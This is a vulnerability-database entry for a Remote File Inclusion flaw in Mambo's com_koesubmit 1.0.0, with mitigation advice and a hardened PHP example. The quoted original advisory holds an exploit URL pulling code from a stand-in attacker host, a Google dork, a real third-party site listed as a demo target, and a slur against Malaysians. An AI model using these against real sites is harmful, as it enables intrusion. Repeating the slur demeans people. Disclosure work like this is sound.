Vendor: com_koesubmit
By: Don Tukulesto
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Inclusion
CWE: 98
Product Name: com_koesubmit
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mambo:mambo_com_koesubmit:1.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Mambo com_koesubmit 1.0.0 Remote File Inclusion

Mambo com_koesubmit 1.0.0 contains a Remote File Inclusion vulnerability in components/com_koesubmit/koesubmit.php. An attacker can exploit it by sending a specially crafted HTTP request whose mosConfig_absolute_path parameter carries a malicious URL; the script uses that value in an include, which allows the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before it is used in the application, and in particular that request-supplied values such as mosConfig_absolute_path are never used as include paths. Also ensure that the application runs with the least privileges necessary.
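As an added illustration (not code from com_koesubmit, Mambo, or the advisory author), the following PHP shows the include shape behind this class of bug and a hardened replacement; the helper file names and the `$install_root` derivation are placeholders.

```php
<?php
// Added illustration (not code from com_koesubmit, Mambo, or the advisory author).
// First the include shape behind this class of bug, then a hardened replacement.
// File names and $install_root are placeholders.

// VULNERABLE SHAPE. Mambo sets $mosConfig_absolute_path in configuration.php and
// expects components to be loaded through index.php. If koesubmit.php is requested
// directly and PHP's register_globals is on (removed in PHP 5.4), the query string
// populates that variable instead, and with allow_url_include on the include
// fetches whatever URL the request named.
function vulnerable_include(string $mosConfig_absolute_path): void
{
    // no direct-access guard, no validation of the path
    require_once $mosConfig_absolute_path . '/includes/helper.php'; // placeholder
}

// HARDENED SHAPE, step 1 of 3: is this base usable as a local include directory?
// Rejects stream wrappers (http://, ftp://, php://, data:, phar:) and any path that
// does not resolve to a real directory inside the installation root.
function is_local_include_base(string $candidate, string $install_root): bool
{
    if (preg_match('#^(?:[a-z][a-z0-9+.\-]*://|data:|phar:)#i', $candidate)) {
        return false;
    }
    $real = realpath($candidate);
    $root = realpath($install_root);
    if ($real === false || $root === false) {
        return false; // e.g. the advisory's "attacker?" value does not exist locally
    }
    return $real === $root || strpos($real, $root . DIRECTORY_SEPARATOR) === 0;
}

// Step 2: refuse direct requests. Mambo/Joomla 1.0 define _VALID_MOS in index.php
// before any component runs, so a direct hit on koesubmit.php never has it.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// Step 3: derive the base from the file's own location, never from a request
// variable, and still run it through the check before including anything.
$install_root = dirname(__DIR__, 2);  // placeholder: two levels above components/com_koesubmit
$base = __DIR__;
if (!is_local_include_base($base, $install_root)) {
    die('Invalid include path.');
}
require_once $base . '/helper.php';   // placeholder file

// Server-side backstop in php.ini, independent of component code:
//   allow_url_include = Off   (and ideally allow_url_fopen = Off)
//   register_globals  = Off   (PHP < 5.4 only; the option no longer exists later)
```

Run stand-alone the script stops at the `_VALID_MOS` guard, which is the intended behaviour for a component file requested directly.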
Source (Exploit-DB raw data):

#############################################################################################################
## Mambo com_koesubmit 1.0.0 Remote File Inclusion   							   ##
## Author   : Don Tukulesto (root[at]indonesiancoder[dot]com)						   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date	    : Friday, September 18, 2009      								   ##
## ------------------------------------------------------------------------------------------------------- ##
## _______            __                              __                 ______            __              ##
##|_     _|.-----..--|  |.-----..-----..-----..-----.|__|.---.-..-----. |      |.-----..--|  |.-----..----.##
## _|   |_ |     ||  _  ||  _  ||     ||  -__||__ --||  ||  _  ||     | |   ---||  _  ||  _  ||  -__||   _|##
##|_______||__|__||_____||_____||__|__||_____||_____||__||___._||__|__| |______||_____||_____||_____||__|  ##
##													   ##
## ------------------------------------------------------------------------------------------------------- ##
#############################################################################################################

[ Software Information ]

[+] Software      : Köhn 1st-Submit ( com_koesubmit )
[+] Version	  : 1.0
[+] Vendor	  : www.alibasta.de 
[+] Vulnerability : Remote File Inclusion
[+] Google Dork   : inurl:"com_koesubmit"

#############################################################################################################
[ ExPL0!T ]

http://127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=attacker?


[ Demo ]

http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=
#############################################################################################################

[ HOLA !!! ]

[~] M3NW5, Gonzhack, MISTERSAINT, Cyb3r_tr0n, M364TR0N, v3n0m, Awan Bejat, Plaque, rey_cute
[~] Den Bayan, Den Awink, Chercut, NoGe, kecemplungkalen, Aries Deris, Xshadow, Jack-, Yadoy666 + Tante Miya
[~] kaMtiEz, arianom, RoNz, tiw0L, and You !!!

[ SHOUT ]

Happy Eid al-Fitr 1930 H
Minal aidzin wal faidzin, I ask forgiveness for any wrongs, outward and inward  :) 


AND FOR YOU ALL MALINGSIAL, YOU'RE TRULY THIEF IN ASIA.

# milw0rm.com [2009-09-17]